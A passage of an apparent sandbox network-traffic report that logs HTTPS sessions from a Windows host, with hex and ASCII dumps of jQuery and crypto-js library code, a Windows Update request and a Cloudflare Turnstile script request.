                                                  2024-12-09 08:34:42 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                  2024-12-09 08:34:42 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                  2024-12-09 08:34:42 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                  2024-12-09 08:34:42 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.449750104.17.25.144435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:41 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                  Host: cdnjs.cloudflare.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:41 UTC962INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:41 GMT
                                                  Content-Type: application/javascript; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Cache-Control: public, max-age=30672000
                                                  ETag: W/"61182885-40eb"
                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                  cf-cdnjs-via: cfworker/kv
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Timing-Allow-Origin: *
                                                  X-Content-Type-Options: nosniff
                                                  CF-Cache-Status: HIT
                                                  Age: 232036
                                                  Expires: Sat, 29 Nov 2025 08:34:41 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSslLEzliqIk6ZkbnaB9ewjFqPMkl53TBxwuHg%2FSiye6%2FF59EWmOqykTtruYZVpMsSm%2F%2Fipy5TS%2FdOLRZGqAKewj2hLTUXTLpDuemsidxOOaN8kTX2GfUV4umPt7OMNKm5yShWZK"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                  Strict-Transport-Security: max-age=15780000
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a8519a334277-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:41 UTC407INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                  Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e
                                                  Data Ascii: peof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79
                                                  Data Ascii: ne.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBy
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b
                                                  Data Ascii: =typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d
                                                  Data Ascii: or(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c
                                                  Data Ascii: :0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66
                                                  Data Ascii: ffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringif
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d
                                                  Data Ascii: r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLM
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d
                                                  Data Ascii: bs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31
                                                  Data Ascii: 39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.44974720.109.210.53443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:42 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T+Z2Dp8e6KXcFyn&MD=v9ZYUKTR HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-12-09 08:34:43 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                  MS-CorrelationId: dd507c3a-d029-417b-b188-7a49676635c8
                                                  MS-RequestId: e6e68792-9924-46bd-a1bb-27359e822dde
                                                  MS-CV: fEiJRlOc1ECP9VjX.0
                                                  X-Microsoft-SLSClientCache: 2880
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Mon, 09 Dec 2024 08:34:41 GMT
                                                  Connection: close
                                                  Content-Length: 24490
                                                  2024-12-09 08:34:43 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                  2024-12-09 08:34:43 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.449753104.18.95.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:42 UTC383OUTGET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:43 UTC471INHTTP/1.1 200 OK
